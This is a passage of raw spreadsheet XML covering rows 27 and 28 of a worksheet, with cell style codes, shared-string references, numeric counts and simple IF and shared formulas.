      <c r="X27" s="97" t="s">
        <v>673</v>
      </c>
      <c r="Y27" s="96" t="s">
        <v>674</v>
      </c>
      <c r="Z27" s="96" t="s">
        <v>675</v>
      </c>
      <c r="AA27" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB27" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC27" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD27" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE27" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF27" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG27" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH27" s="99" t="s">
        <v>676</v>
      </c>
      <c r="AI27" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ27" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL27" s="100">
        <v>0.0</v>
      </c>
      <c r="AM27" s="100">
        <v>0.0</v>
      </c>
      <c r="AN27" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP27" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ27" s="100">
        <v>0.0</v>
      </c>
      <c r="AR27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT27" s="100" t="str">
        <f t="shared" ref="AT27:AT32" si="86">IF(AR27="-",AS27,AR27)</f>
        <v>-</v>
      </c>
      <c r="AU27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX27" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY27" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ27" s="100">
        <v>0.0</v>
      </c>
      <c r="BA27" s="102">
        <v>1.0</v>
      </c>
      <c r="BB27" s="102">
        <v>0.0</v>
      </c>
      <c r="BC27" s="102">
        <v>0.0</v>
      </c>
      <c r="BD27" s="102">
        <v>0.0</v>
      </c>
      <c r="BE27" s="102">
        <v>0.0</v>
      </c>
      <c r="BF27" s="102">
        <v>0.0</v>
      </c>
      <c r="BG27" s="102">
        <v>0.0</v>
      </c>
      <c r="BH27" s="102">
        <v>0.0</v>
      </c>
      <c r="BI27" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ27" s="102">
        <v>0.0</v>
      </c>
      <c r="BK27" s="102">
        <v>0.0</v>
      </c>
      <c r="BL27" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM27" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN27" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO27" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP27" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ27" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR27" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS27" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT27" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU27" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV27" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX27" s="104">
        <v>0.0</v>
      </c>
      <c r="BY27" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ27" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB27" s="104">
        <v>0.0</v>
      </c>
      <c r="CC27" s="104">
        <v>0.0</v>
      </c>
      <c r="CD27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF27" s="104" t="str">
        <f t="shared" si="73"/>
        <v>-</v>
      </c>
      <c r="CG27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ27" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK27" s="104">
        <v>0.0</v>
      </c>
      <c r="CL27" s="104">
        <v>0.0</v>
      </c>
      <c r="CM27" s="105">
        <v>1.0</v>
      </c>
      <c r="CN27" s="105">
        <v>0.0</v>
      </c>
      <c r="CO27" s="105">
        <v>0.0</v>
      </c>
      <c r="CP27" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ27" s="105">
        <v>0.0</v>
      </c>
      <c r="CR27" s="105">
        <v>0.0</v>
      </c>
      <c r="CS27" s="105">
        <v>0.0</v>
      </c>
      <c r="CT27" s="105">
        <v>0.0</v>
      </c>
      <c r="CU27" s="105">
        <v>0.0</v>
      </c>
      <c r="CV27" s="105">
        <v>0.0</v>
      </c>
      <c r="CW27" s="105">
        <v>0.0</v>
      </c>
      <c r="CX27" s="105">
        <v>0.0</v>
      </c>
      <c r="CY27" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ27" s="105">
        <v>0.0</v>
      </c>
      <c r="DA27" s="105">
        <v>0.0</v>
      </c>
      <c r="DB27" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC27" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD27" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE27" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF27" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG27" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH27" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI27" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ27" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK27" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL27" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN27" s="108">
        <v>0.0</v>
      </c>
      <c r="DO27" s="108">
        <v>0.0</v>
      </c>
      <c r="DP27" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR27" s="108">
        <v>0.0</v>
      </c>
      <c r="DS27" s="108">
        <v>0.0</v>
      </c>
      <c r="DT27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV27" s="108" t="str">
        <f t="shared" si="85"/>
        <v>-</v>
      </c>
      <c r="DW27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ27" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA27" s="108">
        <v>0.0</v>
      </c>
      <c r="EB27" s="108">
        <v>0.0</v>
      </c>
      <c r="EC27" s="109">
        <v>2.0</v>
      </c>
      <c r="ED27" s="109">
        <v>0.0</v>
      </c>
      <c r="EE27" s="109">
        <v>0.0</v>
      </c>
      <c r="EF27" s="109">
        <v>0.0</v>
      </c>
      <c r="EG27" s="109">
        <v>0.0</v>
      </c>
      <c r="EH27" s="109">
        <v>0.0</v>
      </c>
      <c r="EI27" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ27" s="109">
        <v>0.0</v>
      </c>
      <c r="EK27" s="109">
        <v>0.0</v>
      </c>
      <c r="EL27" s="109">
        <v>0.0</v>
      </c>
      <c r="EM27" s="109">
        <v>0.0</v>
      </c>
      <c r="EN27" s="109">
        <v>0.0</v>
      </c>
      <c r="EO27" s="109">
        <v>0.0</v>
      </c>
      <c r="EP27" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ27" s="109">
        <v>0.0</v>
      </c>
      <c r="ER27" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES27" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET27" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU27" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV27" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW27" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX27" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY27" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ27" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA27" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB27" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC27" s="111">
        <v>2051116.0</v>
      </c>
      <c r="FD27" s="111">
        <v>1.0</v>
      </c>
      <c r="FE27" s="111">
        <v>1.0</v>
      </c>
      <c r="FF27" s="101" t="s">
        <v>12</v>
      </c>
      <c r="FG27" s="111">
        <v>2051116.0</v>
      </c>
      <c r="FH27" s="111">
        <v>1.0</v>
      </c>
      <c r="FI27" s="111">
        <v>1.0</v>
      </c>
      <c r="FJ27" s="111">
        <v>2051116.0</v>
      </c>
      <c r="FK27" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL27" s="111">
        <f t="shared" si="69"/>
        <v>2051116</v>
      </c>
      <c r="FM27" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN27" s="111">
        <v>2051116.0</v>
      </c>
      <c r="FO27" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP27" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ27" s="111">
        <v>0.0</v>
      </c>
      <c r="FR27" s="111">
        <v>0.0</v>
      </c>
      <c r="FS27" s="112">
        <v>1.0</v>
      </c>
      <c r="FT27" s="112">
        <v>1.0</v>
      </c>
      <c r="FU27" s="112">
        <v>1.0</v>
      </c>
      <c r="FV27" s="112">
        <v>0.0</v>
      </c>
      <c r="FW27" s="112">
        <v>1.0</v>
      </c>
      <c r="FX27" s="112">
        <v>1.0</v>
      </c>
      <c r="FY27" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ27" s="112">
        <v>0.0</v>
      </c>
      <c r="GA27" s="112">
        <v>0.0</v>
      </c>
      <c r="GB27" s="112">
        <v>0.0</v>
      </c>
      <c r="GC27" s="112">
        <v>1.0</v>
      </c>
      <c r="GD27" s="112">
        <v>1.0</v>
      </c>
      <c r="GE27" s="112">
        <v>0.0</v>
      </c>
      <c r="GF27" s="112">
        <v>1.0</v>
      </c>
      <c r="GG27" s="112">
        <v>1.0</v>
      </c>
      <c r="GH27" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI27" s="113">
        <f t="shared" si="40"/>
        <v>1</v>
      </c>
      <c r="GJ27" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK27" s="113">
        <f t="shared" si="42"/>
        <v>1</v>
      </c>
      <c r="GL27" s="113">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="GM27" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN27" s="113">
        <f t="shared" si="45"/>
        <v>1</v>
      </c>
      <c r="GO27" s="113">
        <f t="shared" si="46"/>
        <v>1</v>
      </c>
      <c r="GP27" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ27" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR27" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS27" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT27" s="94"/>
      <c r="GU27" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV27" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW27" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF27" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG27" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH27" s="116">
        <v>27457.0</v>
      </c>
      <c r="HI27" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ27" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK27" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL27" s="93">
        <v>1.0</v>
      </c>
      <c r="HM27" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN27" s="93">
        <v>0.0</v>
      </c>
      <c r="HO27" s="93">
        <v>1.0</v>
      </c>
      <c r="HP27" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ27" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR27" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS27" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT27" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU27" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV27" s="119">
        <v>92322.0</v>
      </c>
      <c r="HW27" s="119">
        <v>1.0</v>
      </c>
      <c r="HX27" s="119">
        <v>1.0</v>
      </c>
      <c r="HY27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC27" s="120">
        <f t="shared" ref="IC27:IC28" si="87">HV27</f>
        <v>92322</v>
      </c>
      <c r="ID27" s="120"/>
      <c r="IE27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF27" s="120">
        <v>92322.0</v>
      </c>
      <c r="IG27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH27" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II27" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ27" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK27" s="99">
        <v>1.0</v>
      </c>
      <c r="IL27" s="99">
        <v>0.0</v>
      </c>
      <c r="IM27" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN27" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO27" s="98">
        <v>0.0</v>
      </c>
      <c r="IP27" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ27" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR27" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS27" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT27" s="127"/>
      <c r="IU27" s="127"/>
      <c r="IV27" s="127"/>
      <c r="IW27" s="127"/>
      <c r="IX27" s="127"/>
      <c r="IY27" s="127"/>
      <c r="IZ27" s="127"/>
      <c r="JA27" s="127"/>
      <c r="JB27" s="127"/>
      <c r="JC27" s="127"/>
      <c r="JD27" s="127"/>
      <c r="JE27" s="127"/>
      <c r="JF27" s="127"/>
      <c r="JG27" s="127"/>
      <c r="JH27" s="127"/>
      <c r="JI27" s="127"/>
      <c r="JJ27" s="127"/>
      <c r="JK27" s="127"/>
      <c r="JL27" s="127"/>
      <c r="JM27" s="127"/>
      <c r="JN27" s="127"/>
      <c r="JO27" s="127"/>
      <c r="JP27" s="127"/>
      <c r="JQ27" s="127"/>
      <c r="JR27" s="127"/>
      <c r="JS27" s="127"/>
      <c r="JT27" s="127"/>
      <c r="JU27" s="127"/>
      <c r="JV27" s="127"/>
      <c r="JW27" s="127"/>
      <c r="JX27" s="127"/>
      <c r="JY27" s="127"/>
      <c r="JZ27" s="127"/>
      <c r="KA27" s="127"/>
      <c r="KB27" s="127"/>
      <c r="KC27" s="127"/>
      <c r="KD27" s="127"/>
      <c r="KE27" s="127"/>
      <c r="KF27" s="127"/>
      <c r="KG27" s="127"/>
      <c r="KH27" s="127"/>
      <c r="KI27" s="127"/>
      <c r="KJ27" s="127"/>
      <c r="KK27" s="127"/>
      <c r="KL27" s="127"/>
      <c r="KM27" s="127"/>
      <c r="KN27" s="127"/>
      <c r="KO27" s="127"/>
      <c r="KP27" s="127"/>
      <c r="KQ27" s="127"/>
      <c r="KR27" s="127"/>
      <c r="KS27" s="127"/>
      <c r="KT27" s="127"/>
      <c r="KU27" s="127"/>
      <c r="KV27" s="127"/>
      <c r="KW27" s="127"/>
      <c r="KX27" s="127"/>
      <c r="KY27" s="127"/>
      <c r="KZ27" s="127"/>
      <c r="LA27" s="127"/>
      <c r="LB27" s="127"/>
      <c r="LC27" s="127"/>
      <c r="LD27" s="127"/>
      <c r="LE27" s="127"/>
      <c r="LF27" s="127"/>
      <c r="LG27" s="127"/>
      <c r="LH27" s="127"/>
      <c r="LI27" s="127"/>
      <c r="LJ27" s="127"/>
      <c r="LK27" s="127"/>
      <c r="LL27" s="127"/>
      <c r="LM27" s="127"/>
      <c r="LN27" s="127"/>
      <c r="LO27" s="127"/>
      <c r="LP27" s="127"/>
      <c r="LQ27" s="127"/>
      <c r="LR27" s="127"/>
      <c r="LS27" s="127"/>
      <c r="LT27" s="127"/>
      <c r="LU27" s="127"/>
      <c r="LV27" s="127"/>
      <c r="LW27" s="127"/>
      <c r="LX27" s="127"/>
      <c r="LY27" s="127"/>
      <c r="LZ27" s="127"/>
      <c r="MA27" s="127"/>
      <c r="MB27" s="127"/>
      <c r="MC27" s="127"/>
      <c r="MD27" s="127"/>
      <c r="ME27" s="127"/>
      <c r="MF27" s="127"/>
      <c r="MG27" s="127"/>
      <c r="MH27" s="127"/>
      <c r="MI27" s="127"/>
      <c r="MJ27" s="127"/>
      <c r="MK27" s="127"/>
      <c r="ML27" s="127"/>
      <c r="MM27" s="127"/>
      <c r="MN27" s="127"/>
      <c r="MO27" s="127"/>
      <c r="MP27" s="127"/>
      <c r="MQ27" s="127"/>
      <c r="MR27" s="127"/>
      <c r="MS27" s="127"/>
      <c r="MT27" s="127"/>
      <c r="MU27" s="127"/>
      <c r="MV27" s="127"/>
      <c r="MW27" s="127"/>
      <c r="MX27" s="127"/>
      <c r="MY27" s="127"/>
      <c r="MZ27" s="127"/>
      <c r="NA27" s="127"/>
      <c r="NB27" s="127"/>
      <c r="NC27" s="127"/>
      <c r="ND27" s="127"/>
      <c r="NE27" s="127"/>
      <c r="NF27" s="127"/>
      <c r="NG27" s="127"/>
      <c r="NH27" s="127"/>
      <c r="NI27" s="127"/>
      <c r="NJ27" s="127"/>
      <c r="NK27" s="127"/>
      <c r="NL27" s="127"/>
      <c r="NM27" s="127"/>
      <c r="NN27" s="127"/>
      <c r="NO27" s="127"/>
      <c r="NP27" s="127"/>
      <c r="NQ27" s="127"/>
      <c r="NR27" s="127"/>
      <c r="NS27" s="127"/>
      <c r="NT27" s="127"/>
      <c r="NU27" s="127"/>
      <c r="NV27" s="127"/>
      <c r="NW27" s="127"/>
      <c r="NX27" s="127"/>
      <c r="NY27" s="127"/>
    </row>
    <row r="28" ht="153.75" customHeight="1">
      <c r="B28" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C28" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D28" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E28" s="90" t="s">
        <v>677</v>
      </c>
      <c r="F28" s="90" t="s">
        <v>678</v>
      </c>
      <c r="G28" s="91" t="s">
        <v>679</v>
      </c>
      <c r="H28" s="90" t="s">
        <v>680</v>
      </c>
      <c r="I28" s="92" t="s">
        <v>681</v>
      </c>
      <c r="J28" s="92" t="s">
        <v>682</v>
      </c>
      <c r="K28" s="92" t="s">
        <v>683</v>
      </c>
      <c r="L28" s="93" t="s">
        <v>679</v>
      </c>
      <c r="M28" s="93">
        <v>200.0</v>
      </c>
      <c r="N28" s="93">
        <v>10.0</v>
      </c>
      <c r="O28" s="93">
        <v>0.0</v>
      </c>
      <c r="P28" s="93">
        <v>204.0</v>
      </c>
      <c r="Q28" s="93">
        <f t="shared" si="70"/>
        <v>204</v>
      </c>
      <c r="R28" s="93">
        <v>204.0</v>
      </c>
      <c r="S28" s="93">
        <v>0.0</v>
      </c>
      <c r="T28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U28" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V28" s="96" t="s">
        <v>684</v>
      </c>
      <c r="W28" s="96" t="s">
        <v>685</v>
      </c>
      <c r="X28" s="97" t="s">
        <v>686</v>
      </c>
      <c r="Y28" s="96" t="s">
        <v>687</v>
      </c>
      <c r="Z28" s="96" t="s">
        <v>688</v>
      </c>
      <c r="AA28" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB28" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC28" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD28" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE28" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF28" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG28" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH28" s="99" t="s">
        <v>689</v>
      </c>
      <c r="AI28" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ28" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL28" s="100">
        <v>0.0</v>
      </c>
      <c r="AM28" s="100">
        <v>0.0</v>
      </c>
      <c r="AN28" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP28" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ28" s="100">
        <v>0.0</v>
      </c>
      <c r="AR28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT28" s="100" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AU28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX28" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY28" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ28" s="100">
        <v>0.0</v>
      </c>
      <c r="BA28" s="102">
        <v>199.0</v>
      </c>
      <c r="BB28" s="102">
        <v>0.0</v>
      </c>
      <c r="BC28" s="102">
        <v>0.0</v>
      </c>
      <c r="BD28" s="102">
        <v>0.0</v>
      </c>
      <c r="BE28" s="102">
        <v>0.0</v>
      </c>
      <c r="BF28" s="102">
        <v>0.0</v>
      </c>
      <c r="BG28" s="102">
        <v>0.0</v>
      </c>
      <c r="BH28" s="102">
        <v>0.0</v>
      </c>
      <c r="BI28" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ28" s="102">
        <v>0.0</v>
      </c>
      <c r="BK28" s="102">
        <v>0.0</v>
      </c>
      <c r="BL28" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM28" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN28" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO28" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP28" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ28" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR28" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS28" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT28" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU28" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV28" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX28" s="104">
        <v>0.0</v>
      </c>
      <c r="BY28" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ28" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB28" s="104">
        <v>0.0</v>
      </c>
      <c r="CC28" s="104">
        <v>0.0</v>
      </c>
      <c r="CD28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF28" s="104" t="str">
        <f t="shared" si="73"/>
        <v>-</v>
      </c>
      <c r="CG28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ28" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK28" s="104">
        <v>0.0</v>
      </c>
      <c r="CL28" s="104">
        <v>0.0</v>
      </c>
      <c r="CM28" s="105">
        <v>199.0</v>
      </c>
      <c r="CN28" s="105">
        <v>0.0</v>
      </c>
      <c r="CO28" s="105">
        <v>0.0</v>
      </c>
      <c r="CP28" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ28" s="105">
        <v>0.0</v>
      </c>
      <c r="CR28" s="105">
        <v>0.0</v>
      </c>
      <c r="CS28" s="105">
        <v>0.0</v>
      </c>
      <c r="CT28" s="105">
        <v>0.0</v>
      </c>
      <c r="CU28" s="105">
        <v>0.0</v>
      </c>
      <c r="CV28" s="105">
        <v>0.0</v>
      </c>
      <c r="CW28" s="105">
        <v>0.0</v>
      </c>
      <c r="CX28" s="105">
        <v>0.0</v>
      </c>
      <c r="CY28" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ28" s="105">
        <v>0.0</v>
      </c>
      <c r="DA28" s="105">
        <v>0.0</v>
      </c>
      <c r="DB28" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC28" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD28" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE28" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF28" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG28" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH28" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI28" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ28" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK28" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL28" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM28" s="108" t="s">
        <v>690</v>
      </c>
      <c r="DN28" s="108">
        <v>2.0</v>
      </c>
      <c r="DO28" s="108">
        <v>205.0</v>
      </c>
      <c r="DP28" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ28" s="108" t="s">
        <v>690</v>
      </c>
      <c r="DR28" s="108">
        <v>2.0</v>
      </c>
      <c r="DS28" s="108">
        <v>205.0</v>
      </c>
      <c r="DT28" s="108">
        <v>13249.0</v>
      </c>
      <c r="DU28" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV28" s="108">
        <f t="shared" si="85"/>
        <v>13249</v>
      </c>
      <c r="DW28" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX28" s="108">
        <v>13249.0</v>
      </c>
      <c r="DY28" s="108">
        <v>54827.0</v>
      </c>
      <c r="DZ28" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA28" s="108">
        <v>1.0</v>
      </c>
      <c r="EB28" s="108">
        <v>204.0</v>
      </c>
      <c r="EC28" s="109">
        <v>199.0</v>
      </c>
      <c r="ED28" s="109">
        <v>11.0</v>
      </c>
      <c r="EE28" s="109">
        <v>205.0</v>
      </c>
      <c r="EF28" s="109">
        <v>205.0</v>
      </c>
      <c r="EG28" s="109">
        <v>0.0</v>
      </c>
      <c r="EH28" s="109">
        <v>205.0</v>
      </c>
      <c r="EI28" s="109">
        <v>10.0</v>
      </c>
      <c r="EJ28" s="109">
        <v>0.0</v>
      </c>
      <c r="EK28" s="109">
        <v>204.0</v>
      </c>
      <c r="EL28" s="109">
        <v>204.0</v>
      </c>
      <c r="EM28" s="109">
        <v>11.0</v>
      </c>
      <c r="EN28" s="109">
        <v>205.0</v>
      </c>
      <c r="EO28" s="109">
        <v>205.0</v>
      </c>
      <c r="EP28" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ28" s="109">
        <v>205.0</v>
      </c>
      <c r="ER28" s="110">
        <f t="shared" si="27"/>
        <v>1.1</v>
      </c>
